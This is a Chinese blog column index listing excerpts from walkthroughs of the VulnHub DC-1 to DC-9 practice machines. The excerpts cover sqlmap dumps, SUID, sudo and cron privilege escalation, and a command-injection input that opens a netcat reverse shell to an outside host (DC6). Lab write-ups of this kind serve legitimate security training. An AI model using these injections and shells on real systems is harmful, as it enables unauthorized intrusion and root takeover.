vulnhub-DC系列
文章平均质量分 85
DC系列共有九个靶机
江湖伤心人
我要在我落拓的人生里,高歌破阵
展开
专栏收录文章
- 默认排序
- 最新发布
- 最早发布
- 最多阅读
- 最少阅读
-
vulnhub-DC9
回想到开始的端口扫描到了靶机运行了SSH服务,但状态是filtered,说明22端口的流量被过滤了,猜测可能存在knockd服务:即敲门端口服务,该服务通过动态的添加iptables规则来隐藏系统开启的服务,使用自定义的一系列序列号来“敲门”,,使系统开启需要访问的服务端口,才能对外访问,不使用时,再使用自定义序列号来“关门”,将端口关闭,不对外监听。登录成功,转到root目录下,查看有没有关于flag的文件,通常情况下,flag都在root目录下,果然在这里。原创 2025-06-09 17:25:00 · 869 阅读 · 0 评论 -
vulnhub-DC8
并在kali开启http服务 service apache2 start,需要进入/tmp 路径下 (不然没有权限 就下载不了)然后给 一个权限:chmod 777 666.sh。nid=1 -D d7db -T users -C name,pass -dump #列出账号密码。使用find命令查找具有suid权限的命令,找到一个exim4命令,exim是一款在Unix系统上使用的邮件服务,exim4在使用时具有root权限。nid=1 -D d7db -T users --columns #列出字段。原创 2025-06-08 19:23:22 · 695 阅读 · 0 评论 -
vulnhub-DC7
Drush(Drush = Drupal + Shell)就是使用命令行命令来操作Drupal站点,它的命令格式与git类似,都是双字命令(drush + 实际的命令)。但是,使用Drush要远优于编写自己的脚本,好处在于,一是可以利用Drush开发社区的力量,二是Drush的命令更加可靠,适用于更多变的环境。现在可以对backups.sh文件进行修改了,可以把反弹shell写入sh文件中,因为sh文件是root执行的,所以返回的也是root权限。DC-7引入了一些“新”概念,但我将让您弄清楚它们是什么。原创 2025-06-07 13:21:37 · 874 阅读 · 0 评论 -
vulnhub-DC6
然后在上面输入127.0.0.1|nc -e /bin/bash 192.168.16.108 4444,但是发现长度不够长,看看用元素选择器能不能修改,长度,发现可以修改长度,这里就修改个500吧。登录成功,执行:sudo -l,在/home/jens目录下发现一个sh文件,如果以jens身份执行不需要密码。执行sudo -l命令,发现在jens的shell下,可以在不需要密码的情况下,以root的身份权限执行nmap。由于输入命令没有显示出来,只能盲敲,在/root目录下找到flag文件。原创 2025-06-06 11:26:57 · 726 阅读 · 0 评论 -
vulnhub-DC5
按照文件的说明,可分为三部分,将第一个框里内容保存为第一文件,名为libhax.c,然后使用黄色选取的命令编译,编译结束会生成libhax.so文件。打开这几个页面,发现发开footer.php时,不断刷新,图标也在不断地变化,确认文件包含页面是footer.php。第二个框里内容保存为rootshell.c文件,使用黄色选区的命令编译,编译结束后生成rootshell文件。这个时候可以把libhax.c和rootshell.c这两个文件删除 ,因为已经编译好了,留他们也没有用了。原创 2025-06-04 04:58:32 · 673 阅读 · 0 评论 -
vulnhub-DC4
sudo -l查看权限,发现可以不需要密码执行teehee(root权限),teehee可以来向其他文件写入内容。访问http://192.168.13.134/,使用bp爆破一下,这里密码薄采用kali路径下的。在/var/mail/下得到charles的密码 ^xHhA&hvim0y ,切换为charles。2.通过定时任务执行脚本提权,向/etc/crontab文件中写入新的定时任务。#如:admin❌0:0::/home/admin:/bin/bash。开放:80、22 端口。原创 2025-06-03 08:54:58 · 595 阅读 · 0 评论 -
vulnhub-DC1
发现有个叫flag4的账号,但是查看使用/etc/shadow失败,但是前面nmap扫描的时候发现了 ssh 服务,现在又发现了 flag4 用户,所以尝试使用hydra进行密码的暴力猜解。SUID可以让调用者以文件拥有者的身份运行该文件,所以利用SUID提权的思路就是运行root用户所拥有的SUID的文件,那么运行该文件的时候就得获得root用户的身份了。为结束标志的,所以这句命令后面的分号是不可缺少的,考虑到各个系统中分号会有不同的意义,所以在分号前面加反斜杠。它存储用户帐户信息。原创 2025-05-29 13:44:00 · 1585 阅读 · 0 评论 -
vulnhub-DC3
就开了一个80端口,直接访问发现是Joomla 使用网站指纹工具whatweb识别靶机网址使用的web服务、系统版本、CMS系统等。通过上面信息收集的基本信息我们可以 去发现漏洞 使用工具searchsploit 搜Joomla 的版本号即可。通过探测可以知道Joomla 的版本 3.7.0 以及CMS的后台地址/administrator/这里回显的是一个SQL注入的漏洞 根据这个思路可以对网页进行SQL注入的一些操作。然后用蚁剑连接shell(这里的url是haha.php的路径)原创 2025-06-03 06:21:11 · 602 阅读 · 0 评论 -
vulnhub-DC2
发现访问不了,且发现输入的ip地址自动转化为了域名,想到dc-2这个域名解析失败,需要更改hosts文件,添加一个ip域名指向。靶机下载地址:https://www.vulnhub.com/entry/dc-2,311/发现开放了7744端口,开放了ssh服务,OpenSSH 6.7p1。发现开放了80端口,存在web服务,Apache/2.4.10,添加完成后,再次访问,可以发现这是一个wordpress的站点。修改hosts文件,添加靶机IP到域名dc-2的指向。这里没有暗示,一,你现在只能靠自己了。原创 2025-05-31 23:42:03 · 1016 阅读 · 0 评论
分享